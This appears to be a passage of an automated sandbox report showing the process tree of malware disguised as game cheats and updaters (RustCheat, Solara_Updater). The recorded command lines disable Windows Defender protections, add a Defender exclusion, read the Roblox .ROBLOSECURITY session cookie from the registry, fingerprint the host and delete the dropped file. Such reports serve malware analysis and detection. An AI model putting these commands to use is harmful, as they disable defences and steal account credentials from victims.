        
        PID:1508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        23⤵
        
        PID:2024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        
        PID:2584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        
        PID:2888
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        23⤵
        
        PID:1696
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        23⤵
        
        PID:2844
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:1920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        23⤵
        
        PID:1780
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        23⤵
        Detects videocard installed
        
        PID:1660
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
        23⤵
        
        PID:1868
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        24⤵
        Runs ping.exe
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        21⤵
        Executes dropped EXE
        
        PID:3036
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        22⤵
        
        PID:2668
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        23⤵
        Loads dropped DLL
        
        PID:1652
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        24⤵
        
        PID:588
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        21⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        22⤵
        Executes dropped EXE
        
        PID:2428
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        22⤵
        Executes dropped EXE
        
        PID:2708
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        23⤵
        
        PID:1840
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        24⤵
        Loads dropped DLL
        
        PID:1924
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        25⤵
        
        PID:320
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        22⤵
        
        PID:1152
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        23⤵
        Executes dropped EXE
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        23⤵
        Executes dropped EXE
        
        PID:948
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        24⤵
        
        PID:1668
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        25⤵
        Loads dropped DLL
        
        PID:3048
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        26⤵
        
        PID:336
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        23⤵
        
        PID:1944
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        24⤵
        Executes dropped EXE
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        24⤵
        Executes dropped EXE
        
        PID:1388
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        25⤵
        
        PID:2476
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        26⤵
        Loads dropped DLL
        
        PID:2572
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        27⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        24⤵
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        25⤵
        Executes dropped EXE
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        25⤵
        
        PID:748
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        26⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        27⤵
        Loads dropped DLL
        
        PID:556
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        28⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        25⤵
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        26⤵
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        27⤵
        
        PID:864
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        27⤵
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        26⤵
        
        PID:2616
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        27⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        28⤵
        Loads dropped DLL
        
        PID:2276
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        29⤵
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        26⤵
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        27⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        28⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        28⤵
        Drops file in Drivers directory
        
        PID:1472
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:2104
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        29⤵
        Views/modifies file attributes
        
        PID:1980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        29⤵
        
        PID:308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        
        PID:1624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        
        PID:2868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        29⤵
        
        PID:1052
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        29⤵
        
        PID:2584
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        29⤵
        
        PID:1980
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        29⤵
        Detects videocard installed
        
        PID:2224
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause
        29⤵
        
        PID:2876
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        30⤵
        Runs ping.exe
        
        PID:2756
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        27⤵
        
        PID:1208
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        28⤵
        
        PID:2960
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        29⤵
        Loads dropped DLL
        
        PID:2392
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        30⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        27⤵
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        28⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        28⤵
        
        PID:2500
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        29⤵
        
        PID:1524
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        30⤵
        Loads dropped DLL
        
        PID:852
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        31⤵
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        28⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        29⤵
        
        PID:1720
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        29⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        30⤵
        
        PID:2616
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        31⤵
        Loads dropped DLL
        
        PID:1444
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        32⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        29⤵
        
        PID:696
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        30⤵
        
        PID:700
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        30⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        31⤵
        
        PID:912
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        32⤵
        Loads dropped DLL
        
        PID:2000
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        33⤵
        
        PID:1100
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        30⤵
        
        PID:3048
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        31⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        31⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        32⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        33⤵
        Loads dropped DLL
        
        PID:1652
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        34⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        31⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        32⤵
        
        PID:1144
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        32⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        33⤵
        
        PID:3052
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        34⤵
        Loads dropped DLL
        
        PID:2740
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        35⤵
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        32⤵
        
        PID:1872
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        33⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        33⤵
        
        PID:1184
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        34⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        35⤵
        Loads dropped DLL
        
        PID:2500
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        36⤵
        
        PID:796
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        33⤵
        
        PID:2940
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        34⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        34⤵
        
        PID:2724
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        35⤵
        
        PID:1636
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        36⤵
        Loads dropped DLL
        
        PID:2752
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        37⤵
        
        PID:944
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        34⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        35⤵
        
        PID:1044
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        35⤵
        
        PID:2812
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        36⤵
        
        PID:1428
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        37⤵
        Loads dropped DLL
        
        PID:2812
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        38⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        35⤵
        
        PID:672
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        36⤵
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        37⤵
        
        PID:2572
        
        C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"
        37⤵
        
        PID:1044
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        36⤵
        
        PID:1236
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        37⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        38⤵
        Loads dropped DLL
        
        PID:744
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        39⤵
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        36⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        37⤵
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        37⤵
        
        PID:2936
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        38⤵
        
        PID:1660
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        39⤵
        Loads dropped DLL
        
        PID:1148
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        40⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        37⤵
        
        PID:2808
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        38⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        38⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        39⤵
        
        PID:1560
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        40⤵
        Loads dropped DLL
        
        PID:1732
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        41⤵
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        38⤵
        
        PID:864
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        39⤵
        
        PID:1320
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        39⤵
        
        PID:1392
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        40⤵
        
        PID:1952
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        41⤵
        Loads dropped DLL
        
        PID:2520
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        42⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        39⤵
        
        PID:348
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        40⤵
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        40⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        41⤵
        
        PID:1608
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        42⤵
        Loads dropped DLL
        
        PID:1724
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        43⤵
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        40⤵
        
        PID:840
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        41⤵
        
        PID:1148
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        41⤵
        
        PID:2680
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        42⤵
        
        PID:2508
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        43⤵
        Loads dropped DLL
        
        PID:2248
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        44⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        41⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        42⤵
        
        PID:468
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        42⤵
        
        PID:2404
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        43⤵
        
        PID:588
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        44⤵
        Loads dropped DLL
        
        PID:1292
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        45⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        42⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        43⤵
        
        PID:604
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        43⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        44⤵
        
        PID:2940
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        45⤵
        Loads dropped DLL
        
        PID:772
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        46⤵
        
        PID:1680
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        43⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
        44⤵
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\sol.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sol.exe"
        44⤵
        
        PID:2632
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"
        45⤵
        
        PID:2008
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "
        46⤵
        Loads dropped DLL
        
        PID:888
        
        C:\hostNet\bridgeblockportComBroker.exe
        
        "C:\hostNet/bridgeblockportComBroker.exe"
        47⤵
        
        PID:2228
        
        C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"
        44⤵
        
        PID:832
        
